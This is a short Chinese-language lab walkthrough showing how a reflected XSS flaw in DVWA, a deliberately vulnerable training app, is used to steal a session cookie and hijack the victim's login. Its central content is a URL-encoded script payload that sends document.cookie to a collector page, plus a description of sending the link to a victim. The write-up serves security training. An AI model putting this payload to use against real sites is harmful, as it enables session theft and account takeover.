dvwa中 利用反射型xss获取cookie进行会话的劫持演示

首先打开dvwa,设置安全等级为low:

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第1张图片


输入证明弹窗:

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第2张图片

编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第3张图片

构造如下URL,并发送给被攻击者:

原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=

需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

受害者点击URL,会跳转到http://127.0.0.1/dvwa/cookie.php,并将cookie写入到了同目录下的cookie.txt中:

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第4张图片

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第5张图片

最后攻击者利用获取到的cookie登录到受害者的账户:

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第6张图片

dvwa中 利用反射型xss获取cookie进行会话的劫持演示_第7张图片





你可能感兴趣的:(学习笔记)